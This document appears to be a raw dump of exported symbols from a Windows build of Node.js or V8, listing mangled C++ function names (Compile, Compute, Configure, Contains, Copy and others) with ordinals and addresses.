                                                                                                                                                                                                                                    ?CompileOptimized@Compiler@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4ConcurrencyMode@23@W4CodeKind@23@@Z45920x140c01df0
                                                                                                                                                                                                                                    ?CompileOptimizedOSR@Compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@VBytecodeOffset@23@PEAVUnoptimizedFrame@23@W4ConcurrencyMode@23@@Z45930x140c01ec0
                                                                                                                                                                                                                                    ?CompileSharedWithBaseline@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z45940x140c028a0
                                                                                                                                                                                                                                    ?CompileSpecificJSToWasmWrapper@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVIsolate@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@PEBUWasmModule@234@@Z45950x1406bc260
                                                                                                                                                                                                                                    ?CompileToNativeModule@wasm@internal@v8@@YA?AV?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@PEAVIsolate@23@AEBVWasmFeatures@123@PEAVErrorThrower@123@V?$shared_ptr@$$CBUWasmModule@wasm@internal@v8@@@5@AEBUModuleWireBytes@123@PEAV?$Handle@VFixedArray@internal@v8@@@23@HVContextId@Recorder@metrics@3@@Z45960x14068f970
                                                                                                                                                                                                                                    ?CompileToplevel@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVParseInfo@23@V?$Handle@VScript@internal@v8@@@23@PEAVIsolate@23@PEAVIsCompiledScope@23@@Z45970x140c03570
                                                                                                                                                                                                                                    ?CompileUnboundInternal@ScriptCompiler@v8@@CA?AV?$MaybeLocal@VUnboundScript@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z45980x140c7db40
                                                                                                                                                                                                                                    ?CompileUnboundScript@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VUnboundScript@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z45990x140c7e120
                                                                                                                                                                                                                                    ?CompileWasmFunction@WasmCompilationUnit@wasm@internal@v8@@SAXPEAVIsolate@34@PEAVNativeModule@234@PEAVWasmFeatures@234@PEBUWasmFunction@234@W4ExecutionTier@234@@Z46000x1406bc330
                                                                                                                                                                                                                                    ?CompileWasmImportCallWrapper@compiler@internal@v8@@YA?AUWasmCompilationResult@wasm@23@PEAUCompilationEnv@523@W4WasmImportCallKind@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@_NHW4Suspend@523@@Z46010x14107f830
                                                                                                                                                                                                                                    ?CompiledWithConcurrentBaseline@CodeBuilder@Factory@internal@v8@@QEBA_NXZ46020x14053e900
                                                                                                                                                                                                                                    ?CompleteInobjectSlackTracking@MapUpdater@internal@v8@@SAXPEAVIsolate@23@VMap@23@@Z46030x14092de80
                                                                                                                                                                                                                                    ?Compress@SnapshotCompression@internal@v8@@SA?AVSnapshotData@23@PEBV423@@Z46040x1407d4e70
                                                                                                                                                                                                                                    ?CompressBlock@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstructionBlock@234@@Z46050x1410fe950
                                                                                                                                                                                                                                    ?CompressGaps@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z46060x1410fea40
                                                                                                                                                                                                                                    ?CompressMoves@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVParallelMove@234@PEAV?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@34@@Z46070x1410feb20
                                                                                                                                                                                                                                    ?CompressedHeapConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VHeapObject@internal@v8@@@34@@Z46080x1410398c0
                                                                                                                                                                                                                                    ?Compute@GCIdleTimeHandler@internal@v8@@QEAA?AW4GCIdleTimeAction@23@NVGCIdleTimeHeapState@23@@Z46090x140b1e980
                                                                                                                                                                                                                                    ?ComputeAndSetHash@String@internal@v8@@AEAAIAEBVSharedStringAccessGuardIfNeeded@23@@Z46100x1408dbd00
                                                                                                                                                                                                                                    ?ComputeAndSetHash@String@internal@v8@@AEAAIXZ46110x1408dbfd0
                                                                                                                                                                                                                                    ?ComputeAssemblyOrder@InstructionSequence@compiler@internal@v8@@AEAAXXZ46120x141031ec0
                                                                                                                                                                                                                                    ?ComputeBranchInfo@CodeGenerator@compiler@internal@v8@@AEAA?AVRpoNumber@234@PEAUBranchInfo@234@PEAVInstruction@234@@Z46130x14106d040
                                                                                                                                                                                                                                    ?ComputeCallFrequency@FeedbackNexus@internal@v8@@QEAAMXZ46140x1409a97d0
                                                                                                                                                                                                                                    ?ComputeCapacity@HashTableBase@internal@v8@@SAHH@Z46150x14053e920
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@KAHHH@Z46160x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@KAHHH@Z46170x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@KAHHH@Z46180x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@KAHHH@Z46190x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@KAHHH@Z46200x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@KAHHH@Z46210x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@KAHHH@Z46220x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@KAHHH@Z46230x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@KAHHH@Z46240x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@KAHHH@Z46250x140909d10
                                                                                                                                                                                                                                    ?ComputeCapacityWithShrink@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@KAHHH@Z46260x140909d10
                                                                                                                                                                                                                                    ?ComputeCodeStartAddress@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z46270x1405f5e50
                                                                                                                                                                                                                                    ?ComputeConfiguration@LookupIterator@internal@v8@@CA?AW4Configuration@123@PEAVIsolate@23@W44123@V?$Handle@VName@internal@v8@@@23@@Z46280x14053e940
                                                                                                                                                                                                                                    ?ComputeDiscardMemoryArea@MemoryAllocator@internal@v8@@SA?AVAddressRegion@base@3@_K0@Z46290x140abd2b0
                                                                                                                                                                                                                                    ?ComputeForwarding@JumpThreading@compiler@internal@v8@@SA_NPEAVZone@34@PEAV?$ZoneVector@VRpoNumber@compiler@internal@v8@@@34@PEAVInstructionSequence@234@_N@Z46300x1410f5fb0
                                                                                                                                                                                                                                    ?ComputeIncoming@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@PEAVOptimizedCompilationInfo@34@@Z46310x14102b680
                                                                                                                                                                                                                                    ?ComputeInternalizationStrategyForString@Factory@internal@v8@@QEAA?AW4StringTransitionStrategy@23@V?$Handle@VString@internal@v8@@@23@PEAV?$MaybeHandle@VMap@internal@v8@@@23@@Z46320x140b223a0
                                                                                                                                                                                                                                    ?ComputeLocation@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@@Z46330x140b66b10
                                                                                                                                                                                                                                    ?ComputeLocationFromDetailedStackTrace@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@V?$Handle@VObject@internal@v8@@@23@@Z46340x140b66cd0
                                                                                                                                                                                                                                    ?ComputeLocationFromException@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@V?$Handle@VObject@internal@v8@@@23@@Z46350x140b66e40
                                                                                                                                                                                                                                    ?ComputeLocationFromSimpleStackTrace@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@V?$Handle@VObject@internal@v8@@@23@@Z46360x140b670a0
                                                                                                                                                                                                                                    ?ComputeLoopState@CsaLoadElimination@compiler@internal@v8@@AEBAPEBUAbstractState@1234@PEAVNode@234@PEBU51234@@Z46370x14112e310
                                                                                                                                                                                                                                    ?ComputeLoopState@LoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@@Z46380x1411b8440
                                                                                                                                                                                                                                    ?ComputeLoopStateForStoreField@LoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@AEBUFieldAccess@234@@Z46390x1411b9130
                                                                                                                                                                                                                                    ?ComputeParamCounts@CallDescriptor@compiler@internal@v8@@AEBAXXZ46400x14102b6b0
                                                                                                                                                                                                                                    ?ComputeSamplingInterval@CpuProfiler@internal@v8@@AEBA?AVTimeDelta@base@3@XZ46410x14087b4e0
                                                                                                                                                                                                                                    ?ComputeSchedule@Scheduler@compiler@internal@v8@@SAPEAVSchedule@234@PEAVZone@34@PEAVGraph@234@V?$Flags@W4Flag@Scheduler@compiler@internal@v8@@H@base@4@PEAVTickCounter@34@PEBVProfileDataFromFile@34@@Z46420x1411d6c30
                                                                                                                                                                                                                                    ?ComputeSharingStrategyForString@Factory@internal@v8@@QEAA?AW4StringTransitionStrategy@23@V?$Handle@VString@internal@v8@@@23@PEAV?$MaybeHandle@VMap@internal@v8@@@23@@Z46430x140b22420
                                                                                                                                                                                                                                    ?ComputeSpecialRPO@Scheduler@compiler@internal@v8@@SAPEAV?$ZoneVector@PEAVBasicBlock@compiler@internal@v8@@@34@PEAVZone@34@PEAVSchedule@234@@Z46440x1411d6e10
                                                                                                                                                                                                                                    ?ComputeSpecialRPONumbering@Scheduler@compiler@internal@v8@@AEAAXXZ46450x1411d6f50
                                                                                                                                                                                                                                    ?ComputeStepSizeInBytes@IncrementalMarking@internal@v8@@AEAA_KW4StepOrigin@23@@Z46460x140af5c40
                                                                                                                                                                                                                                    ?Concat@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVIsolate@2@V32@1@Z46470x140c7e1e0
                                                                                                                                                                                                                                    ?ConcatenateBytes@WasmCode@wasm@internal@v8@@AEAA?AV?$unique_ptr@$$BY0A@$$CBEU?$default_delete@$$BY0A@$$CBE@std@@@std@@V?$initializer_list@V?$Vector@$$CBE@base@v8@@@6@@Z46480x14065ffe0
                                                                                                                                                                                                                                    ?ConfigureCloneObject@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VMap@internal@v8@@@23@0@Z46490x1409a9850
                                                                                                                                                                                                                                    ?ConfigureDefaults@ResourceConstraints@v8@@QEAAX_K0@Z46500x140c7e290
                                                                                                                                                                                                                                    ?ConfigureDefaultsFromHeapSize@ResourceConstraints@v8@@QEAAX_K0@Z46510x140c7e2f0
                                                                                                                                                                                                                                    ?ConfigureFlags@OptimizedCompilationInfo@internal@v8@@AEAAXXZ46520x140be06e0
                                                                                                                                                                                                                                    ?ConfigureHandlerMode@FeedbackNexus@internal@v8@@QEAAXAEBVMaybeObjectHandle@23@@Z46530x1409a9e20
                                                                                                                                                                                                                                    ?ConfigureLexicalVarMode@FeedbackNexus@internal@v8@@QEAA_NHH_N@Z46540x1409a9ea0
                                                                                                                                                                                                                                    ?ConfigureMegaDOM@FeedbackNexus@internal@v8@@QEAAXAEBVMaybeObjectHandle@23@@Z46550x1409a9f30
                                                                                                                                                                                                                                    ?ConfigureMegamorphic@FeedbackNexus@internal@v8@@QEAA_NW4IcCheckType@23@@Z46560x1409a9fd0
                                                                                                                                                                                                                                    ?ConfigureMegamorphic@FeedbackNexus@internal@v8@@QEAA_NXZ46570x1409aa080
                                                                                                                                                                                                                                    ?ConfigureMonomorphic@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VName@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@AEBVMaybeObjectHandle@23@@Z46580x1409aa120
                                                                                                                                                                                                                                    ?ConfigurePolymorphic@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VName@internal@v8@@@23@AEBV?$vector@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@V?$allocator@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@@2@@std@@@Z46590x1409aa2d0
                                                                                                                                                                                                                                    ?ConfigurePropertyCellMode@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VPropertyCell@internal@v8@@@23@@Z46600x1409aa620
                                                                                                                                                                                                                                    ?ConfigureUninitialized@FeedbackNexus@internal@v8@@QEAAXXZ46610x1409aa690
                                                                                                                                                                                                                                    ?ConnectUnreachableToEnd@GraphAssembler@compiler@internal@v8@@QEAAXXZ46620x1410e2190
                                                                                                                                                                                                                                    ?Constant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@AEBVObjectRef@234@@Z46630x1410deb70
                                                                                                                                                                                                                                    ?Constant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@N@Z46640x1410dece0
                                                                                                                                                                                                                                    ?Constant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@AEBVObjectRef@234@@Z46650x1410e2280
                                                                                                                                                                                                                                    ?Constant@Type@compiler@internal@v8@@SA?AV1234@NPEAVZone@34@@Z46660x141027630
                                                                                                                                                                                                                                    ?Constant@Type@compiler@internal@v8@@SA?AV1234@PEAVJSHeapBroker@234@V?$Handle@VObject@internal@v8@@@34@PEAVZone@34@@Z46670x141027700
                                                                                                                                                                                                                                    ?ConstantPoolEntryFor@BytecodeJumpTable@interpreter@internal@v8@@QEAA_KH@Z46680x140a33a50
                                                                                                                                                                                                                                    ?Construct@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z46690x140a5c290
                                                                                                                                                                                                                                    ?Construct@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z46700x140c0d380
                                                                                                                                                                                                                                    ?Construct@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@@Z46710x1410c2e80
                                                                                                                                                                                                                                    ?ConstructForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z46720x140c0d3a0
                                                                                                                                                                                                                                    ?ConstructForwardVarargs@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KI@Z46730x1410c2f60
                                                                                                                                                                                                                                    ?ConstructFunction@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z46740x140c0d3c0
                                                                                                                                                                                                                                    ?ConstructFunctionForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z46750x140c0d3e0
                                                                                                                                                                                                                                    ?ConstructNewMap@MapUpdater@internal@v8@@AEAA?AW4State@123@XZ46760x14092dfd0
                                                                                                                                                                                                                                    ?ConstructNewMapWithIntegrityLevelTransition@MapUpdater@internal@v8@@AEAA?AW4State@123@XZ46770x14092e520
                                                                                                                                                                                                                                    ?ConstructSource@WebSnapshotSerializer@internal@v8@@AEAAXXZ46780x1407af3b0
                                                                                                                                                                                                                                    ?ConstructVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z46790x140c0d400
                                                                                                                                                                                                                                    ?ConstructWithArrayLike@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVCallFrequency@234@AEBUFeedbackSource@234@@Z46800x1410c3030
                                                                                                                                                                                                                                    ?ConstructWithSpread@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z46810x140a5c350
                                                                                                                                                                                                                                    ?ConstructWithSpread@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z46820x140c0d420
                                                                                                                                                                                                                                    ?ConstructWithSpread@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@@Z46830x1410c3110
                                                                                                                                                                                                                                    ?Consume@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4Value@Token@23@@Z46840x14088e130
                                                                                                                                                                                                                                    ?ConsumeCComment@AsmJsScanner@internal@v8@@AEAA_NXZ46850x140733a30
                                                                                                                                                                                                                                    ?ConsumeCPPComment@AsmJsScanner@internal@v8@@AEAAXXZ46860x140733b30
                                                                                                                                                                                                                                    ?ConsumeCompareOrShift@AsmJsScanner@internal@v8@@AEAAXI@Z46870x140733bb0
                                                                                                                                                                                                                                    ?ConsumeIdentifier@AsmJsScanner@internal@v8@@AEAAXI@Z46880x140733cf0
                                                                                                                                                                                                                                    ?ConsumeNumber@AsmJsScanner@internal@v8@@AEAAXI@Z46890x140733ff0
                                                                                                                                                                                                                                    ?ConsumeString@AsmJsScanner@internal@v8@@AEAAXI@Z46900x1407343a0
                                                                                                                                                                                                                                    ?Contains@AddressSpaceReservation@base@v8@@QEBA_NPEAX_K@Z46910x140ff10c0
                                                                                                                                                                                                                                    ?Contains@BitVector@internal@v8@@QEBA_NH@Z46920x14053e970
                                                                                                                                                                                                                                    ?Contains@CodeObjectRegistry@internal@v8@@QEBA_N_K@Z46930x140b48a40
                                                                                                                                                                                                                                    ?Contains@Heap@internal@v8@@QEBA_NVHeapObject@23@@Z46940x140b02a60
                                                                                                                                                                                                                                    ?Contains@LargeObjectSpace@internal@v8@@QEBA_NVHeapObject@23@@Z46950x14053ea20
                                                                                                                                                                                                                                    ?Contains@MemoryRegion@internal@cppgc@@QEBA_NAEBV123@@Z46960x140504600
                                                                                                                                                                                                                                    ?Contains@MemoryRegion@internal@cppgc@@QEBA_NPEBE@Z46970x140504630
                                                                                                                                                                                                                                    ?Contains@NewSpace@internal@v8@@QEBA_NVHeapObject@23@@Z46980x14053e9c0
                                                                                                                                                                                                                                    ?Contains@NewSpace@internal@v8@@QEBA_NVObject@23@@Z46990x14053e9e0
                                                                                                                                                                                                                                    ?Contains@PagedSpace@internal@v8@@QEBA_NVObject@23@@Z47000x14053ea00
                                                                                                                                                                                                                                    ?Contains@PagedSpace@internal@v8@@QEBA_N_K@Z47010x14053ea20
                                                                                                                                                                                                                                    ?Contains@ReadOnlyHeap@internal@v8@@SA_NVHeapObject@23@@Z47020x140aaadf0
                                                                                                                                                                                                                                    ?Contains@ReadOnlyHeap@internal@v8@@SA_N_K@Z47030x140aaadf0
                                                                                                                                                                                                                                    ?Contains@Type@compiler@internal@v8@@CA_NPEBVRangeType@234@0@Z47040x141027820
                                                                                                                                                                                                                                    ?ContainsAsmModule@Scope@internal@v8@@QEBA_NXZ47050x140c63b20
                                                                                                                                                                                                                                    ?ContainsCall@InstructionSequence@compiler@internal@v8@@QEBA_NXZ47060x14057eaf0
                                                                                                                                                                                                                                    ?ContainsCode@Heap@internal@v8@@QEBA_NVHeapObject@23@@Z47070x140b02ba0
                                                                                                                                                                                                                                    ?ContainsForTesting@FreeList@internal@cppgc@@QEBA_NUBlock@123@@Z47080x14051cfe0
                                                                                                                                                                                                                                    ?ContainsLabel@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEBV?$ZoneList@PEBVAstRawString@internal@v8@@@23@PEBVAstRawString@23@@Z47090x14088e140
                                                                                                                                                                                                                                    ?ContainsLocal@BytecodeLoopAssignments@compiler@internal@v8@@QEBA_NH@Z47100x141247c60
                                                                                                                                                                                                                                    ?ContainsOnlyOneByte@String@v8@@QEBA_NXZ47110x140c7e3b0
                                                                                                                                                                                                                                    ?ContainsParameter@BytecodeLoopAssignments@compiler@internal@v8@@QEBA_NH@Z47120x141247cb0
                                                                                                                                                                                                                                    ?ContainsSlow@ArrayBufferList@internal@v8@@QEBA_NPEAVArrayBufferExtension@23@@Z47130x140b49320
                                                                                                                                                                                                                                    ?ContainsSlow@LargeObjectSpace@internal@v8@@QEBA_N_K@Z47140x140af3cb0
                                                                                                                                                                                                                                    ?ContainsSlow@NewSpace@internal@v8@@QEBA_N_K@Z47150x14053ea40
                                                                                                                                                                                                                                    ?ContainsSlow@PagedSpace@internal@v8@@QEBA_N_K@Z47160x140aac600
                                                                                                                                                                                                                                    ?Context@Local@MarkingWorklists@internal@v8@@QEBA_KXZ47170x14033b640
                                                                                                                                                                                                                                    ?ContextAccessOf@compiler@internal@v8@@YAAEBVContextAccess@123@PEBVOperator@123@@Z47180x1403a2160
                                                                                                                                                                                                                                    ?ContextChainLength@Scope@internal@v8@@QEBAHPEAV123@@Z47190x140c63b80
                                                                                                                                                                                                                                    ?ContextChainLengthUntilOutermostSloppyEval@Scope@internal@v8@@QEBAHXZ47200x140c63bb0
                                                                                                                                                                                                                                    ?ContextDisposedNotification@Isolate@v8@@QEAAH_N@Z47210x140c7e4f0
                                                                                                                                                                                                                                    ?ContextHeaderLength@Scope@internal@v8@@QEBAHXZ47220x1407fe950
                                                                                                                                                                                                                                    ?ContextId@Script@debug@v8@@QEBA?AV?$Maybe@H@3@XZ47230x140bc9310
                                                                                                                                                                                                                                    ?ContextLocalCount@Scope@internal@v8@@QEBAHXZ47240x140c63be0
                                                                                                                                                                                                                                    ?ContextRegister@CallInterfaceDescriptor@internal@v8@@SA?AVRegister@23@XZ47250x140572de0
                                                                                                                                                                                                                                    ?Continuations@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRawMachineLabel@234@1@Z47260x1412189e0
                                                                                                                                                                                                                                    ?Continue@ConsStringIterator@internal@v8@@AEAA?AVString@23@PEAH@Z47270x1408dc010
                                                                                                                                                                                                                                    ?Continue@LoopBuilder@interpreter@internal@v8@@QEAAXXZ47280x140a33a60
                                                                                                                                                                                                                                    ?ContinueIfNull@LoopBuilder@interpreter@internal@v8@@QEAAXXZ47290x140a33a90
                                                                                                                                                                                                                                    ?ContinueIfUndefined@LoopBuilder@interpreter@internal@v8@@QEAAXXZ47300x140a33ac0
                                                                                                                                                                                                                                    ?ContributeToSweepingMain@PagedSpace@internal@v8@@IEAA_NHHHW4AllocationOrigin@23@@Z47310x140aac650
                                                                                                                                                                                                                                    ?ControlInputCount@Operator@compiler@internal@v8@@QEBAHXZ47320x140097a40
                                                                                                                                                                                                                                    ?ControlOutputCount@Operator@compiler@internal@v8@@QEBAHXZ47330x140464c90
                                                                                                                                                                                                                                    ?ConvertBinaryToNaryOperationSourceRange@Parser@internal@v8@@AEAAXPEAVBinaryOperation@23@PEAVNaryOperation@23@@Z47340x14088e170
                                                                                                                                                                                                                                    ?ConvertPlainPrimitiveToNumber@TypedOptimization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z47350x141201e70
                                                                                                                                                                                                                                    ?ConvertReceiver@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z47360x141249d10
                                                                                                                                                                                                                                    ?ConvertReceiver@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ConvertReceiverMode@34@@Z47370x1410d7290
                                                                                                                                                                                                                                    ?ConvertTaggedHoleToUndefined@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@V534@@Z47380x1410e22d0
                                                                                                                                                                                                                                    ?ConvertTaggedHoleToUndefined@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z47390x141249de0
                                                                                                                                                                                                                                    ?ConvertTaggedHoleToUndefined@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ47400x1410d72e0
                                                                                                                                                                                                                                    ?ConvertToIndex@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@W4MessageTemplate@23@@Z47410x140909f00
                                                                                                                                                                                                                                    ?ConvertToInteger@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z47420x14090a1c0
                                                                                                                                                                                                                                    ?ConvertToKeysArray@OrderedHashSet@internal@v8@@SA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashSet@internal@v8@@@23@W4GetKeysConversion@23@@Z47430x1408f8e40
                                                                                                                                                                                                                                    ?ConvertToLength@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z47440x14090a260
                                                                                                                                                                                                                                    ?ConvertToString@Object@internal@v8@@CA?AV?$MaybeHandle@VString@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z47450x14090a8a0
                                                                                                                                                                                                                                    ?ConvertUsesToOperand@LiveRange@compiler@internal@v8@@QEAAXAEBVInstructionOperand@234@0@Z47460x14110d090
                                                                                                                                                                                                                                    ?Copy@Buffer@node@@YA?AV?$MaybeLocal@VObject@v8@@@v8@@PEAVIsolate@4@PEBD_K@Z47470x140222610
                                                                                                                                                                                                                                    ?Copy@RegExpBytecodeGenerator@internal@v8@@AEAAXPEAE@Z47480x140854db0
                                                                                                                                                                                                                                    ?CopyAndRelocate@NativeModuleDeserializer@wasm@internal@v8@@AEAAXAEBUDeserializationUnit@234@@Z47490x14061d240
                                                                                                                                                                                                                                    ?CopyBytecodeArray@Factory@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@V423@@Z47500x140b22490
                                                                                                                                                                                                                                    ?CopyCanonicalHandlesForTesting@JSHeapBroker@compiler@internal@v8@@AEAAXV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@@Z47510x1410b6b90
                                                                                                                                                                                                                                    ?CopyCode@Factory@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@23@V423@@Z47520x140b22770
                                                                                                                                                                                                                                    ?CopyCodePages@Isolate@v8@@QEAA_K_KPEAUMemoryRange@2@@Z47530x140c7e700
                                                                                                                                                                                                                                    ?CopyContents@ArrayBufferView@v8@@QEAA_KPEAX_K@Z47540x140c7e790
                                                                                                                                                                                                                                    ?CopyFixedArray@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@@Z47550x140b22900
                                                                                                                                                                                                                                    ?CopyFixedArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@H@Z47560x140b229b0
                                                                                                                                                                                                                                    ?CopyFixedArrayUpTo@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@HW4AllocationType@23@@Z47570x140b229d0
                                                                                                                                                                                                                                    ?CopyFixedArrayWithMap@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@V?$Handle@VMap@internal@v8@@@23@@Z47580x140b22af0
                                                                                                                                                                                                                                    ?CopyFixedDoubleArray@Factory@internal@v8@@QEAA?AV?$Handle@VFixedDoubleArray@internal@v8@@@23@V423@@Z47590x140b22b10
                                                                                                                                                                                                                                    ?CopyForPreventExtensions@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@W4PropertyAttributes@23@V?$Handle@VSymbol@internal@v8@@@23@PEBD_N@Z47600x1409270e0
                                                                                                                                                                                                                                    ?CopyFrom@BitVector@internal@v8@@QEAAXAEBV123@@Z47610x14053ead0
                                                                                                                                                                                                                                    ?CopyGlobal@GlobalHandles@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEA_K@Z47620x140b4c400
                                                                                                                                                                                                                                    ?CopyGlobalReference@api_internal@v8@@YAPEA_KPEA_K@Z47630x140c7e8b0
                                                                                                                                                                                                                                    ?CopyInitialMap@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@HHH@Z47640x1409272e0
                                                                                                                                                                                                                                    ?CopyInsertDescriptor@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@PEAVDescriptor@23@W4TransitionFlag@23@@Z47650x1409273a0
                                                                                                                                                                                                                                    ?CopyJSObject@Factory@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@23@V423@@Z47660x140b22bd0
                                                                                                                                                                                                                                    ?CopyJSObjectWithAllocationSite@Factory@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@23@V423@V?$Handle@VAllocationSite@internal@v8@@@23@@Z47670x140b22bf0
                                                                                                                                                                                                                                    ?CopyPropertyArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VPropertyArray@internal@v8@@@23@V423@H@Z47680x140b23200
